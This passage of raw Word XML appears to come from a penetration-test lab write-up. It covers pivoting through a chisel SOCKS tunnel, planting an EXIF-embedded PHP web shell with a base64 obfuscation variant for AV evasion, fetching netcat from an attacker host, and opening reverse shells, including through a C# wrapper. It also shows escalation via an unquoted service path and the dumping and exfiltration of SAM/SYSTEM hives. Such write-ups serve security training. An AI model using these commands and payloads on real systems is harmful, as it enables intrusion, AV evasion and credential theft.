            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">chisel.exe server -p 13123 --socks5</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 On the attacker machine (client)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">chisel client 10.200.80.150:13123 9050:socks</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 proxychains.conf -&gt; socks5 127.0.0.1 9050</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">proxychains curl http://10.200.80.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With the SOCKS proxy active (and a browser proxy extension configured), the final host's web application became reachable for manual and automated testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Host 3 — Thomas' Workstation (10.200.X.100)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Source Code Recovery via Exposed Git Repository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The web application running on the final host appeared to be a near-identical copy of the public-facing site from Host 1. Rather than black-box testing it directly, the GitStack repository on Host 2 was checked for a matching project — and a Website.git repository was found and downloaded (via Evil-WinRM file download) for offline, white-box source code review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 Vulnerability Analysis — File Upload Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review of the upload handler (resources/index.php) revealed a two-stage validation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An extension whitelist check using explode() to isolate the extension — vulnerable to double-extension bypass (e.g. image.jpg.php), because only the segment the developer intended to check was validated, not the true final extension used by the web server for execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A call to PHP's getimagesize(), intended to confirm the uploaded file is a genuine image by validating embedded dimension data — bypassable by embedding a PHP payload inside a genuine image's EXIF metadata (e.g. the Comment field) using exiftool, so the file remains a structurally valid image while also containing executable PHP.</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">exiftool -Comment='&lt;?php system($_GET["wreath"]); ?&gt;' puppy.jpg</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">mv puppy.jpg puppy.jpg.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3 Authentication &amp; AV-Evasive Delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The upload endpoint sat behind HTTP Basic Authentication. The Thomas credential recovered and cracked from Host 2 (username: thomas) was reused successfully — a direct demonstration of credential reuse risk across systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the target host runs endpoint AV/Defender, the initial payload was refined: the command parameter was Base64-encoded within the EXIF comment to avoid static signature matching, executing via shell_exec() and returning output wrapped in &lt;pre&gt; tags for readability:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># Simplified concept of the obfuscated payload embedded via exiftool</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;?php $c = base64_decode($_GET['wreath']); echo '&lt;pre&gt;'.shell_exec($c).'&lt;/pre&gt;'; ?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The polyglot image was uploaded to /resources/uploads/, and command execution was confirmed as wreath-pc\thomas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.4 Establishing an AV-Evasive Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A stock netcat binary was immediately flagged by Defender. An older, less commonly signatured build of nc.exe (sourced and, per the referenced methodology, cross-compiled with mingw-w64) was staged on an attacker-controlled HTTP server and pulled onto the target via the web shell:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">curl http://&lt;attacker-ip&gt;:8000/nc.exe -o C:\Windows\Temp\nc.exe</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 Triggered via the web shell parameter</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">powershell.exe C:\Windows\Temp\nc.exe &lt;attacker-ip&gt; 4444 -e cmd.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This returned a stable reverse shell as thomas without triggering AV, and without needing to relay through the earlier pivot hosts, since this host had outbound reachability to the attacker's tunnel endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.5 Local Privilege Escalation — Unquoted Service Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration of installed services (using PowerShell's Get-CimInstance / sc qc equivalents) for unquoted executable paths containing spaces revealed SystemExplorerHelpService, running as LOCAL SYSTEM with an unquoted path resolvable to an attacker-writable directory — a classic unquoted-service-path privilege escalation, closely related to the same class of vulnerability abused by PrintSpoofer/Potato-style exploits via SeImpersonatePrivilege.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A minimal C# wrapper binary was written to invoke the AV-evasive netcat build with a callback to a new listener, and compiled locally with Mono's C# compiler:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">using System;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">using System.Diagnostics;</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class Wrapper {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    static void Main() {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">        var p = new ProcessStartInfo("C:\\Windows\\Temp\\nc.exe",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">            "&lt;attacker-ip&gt; 4445 -e cmd.exe") { CreateNoWindow = true };</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">        Process.Start(p);</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">mcs Wrapper.cs -out:Wrapper.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The compiled binary was staged for delivery via an Impacket SMB server, copied onto the target as the vulnerable service's executable, and the service was cycled to trigger execution in the SYSTEM context:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># Attacker: host the payload over SMB</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo python3 smbserver.py share /path/to/payload</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 Target: pull the payload and replace the service binary</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">copy \\&lt;attacker-ip&gt;\share\Wrapper.exe "C:\Program Files (x86)\System Explorer\System Explorer\System.exe"</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 Target: restart the service to execute as SYSTEM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sc stop SystemExplorerHelpService</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sc start SystemExplorerHelpService</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The restarted service executed the wrapper with SYSTEM privileges, and the second listener received a shell confirming nt authority\system — full local privilege escalation on the final, most defended host in the network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.6 Credential Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To validate full compromise and demonstrate impact, the local SAM and SYSTEM registry hives were exported directly (avoiding running Mimikatz, which is aggressively signatured, on an AV-protected host):</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">reg.exe save HKLM\SAM C:\Windows\Temp\sam.bak</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">reg.exe save HKLM\SYSTEM C:\Windows\Temp\system.bak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Both hive files were exfiltrated over an attacker-hosted SMB share, and parsed offline with Impacket's secretsdump.py, yielding the local Administrator NT hash and confirming complete, verifiable compromise of the host:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C9C9C9" w:sz="4"/>
          <w:left w:val="single" w:color="C9C9C9" w:sz="4"/>
          <w:bottom w:val="single" w:color="C9C9C9" w:sz="4"/>
          <w:right w:val="single" w:color="C9C9C9" w:sz="4"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 secretsdump.py -sam sam.bak -system system.bak LOCAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Attack Chain Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">External foothold — CVE-2019-15107 (Webmin) → root on the CentOS host, SSH key harvested for persistence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal recon from the CentOS pivot with a statically-linked Nmap → discovered two internal-only hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSHuttle tunnel established over the harvested SSH key → transparent access to the internal subnet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EDB-ID 43777 (GitStack) → SYSTEM on the internal Windows server; shell relayed back via a Socat proxy on the CentOS pivot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mimikatz credential dumping on the GitStack host → Administrator NTLM hash (pass-the-hash) and Thomas' password (cracked offline).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Empire's in-memory PowerShell port scan (via Evil-WinRM) → identified the final, isolated workstation's open ports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel SOCKS tunnel from the GitStack host → reached the final host's web application through Proxychains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovered the site's source code from the exposed GitStack repository → identified a file-upload validation bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploaded a polyglot JPEG/PHP payload (double extension + EXIF-embedded, Base64-obfuscated code) authenticated with Thomas' reused password → RCE as thomas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Delivered an AV-evasive netcat build for a stable reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
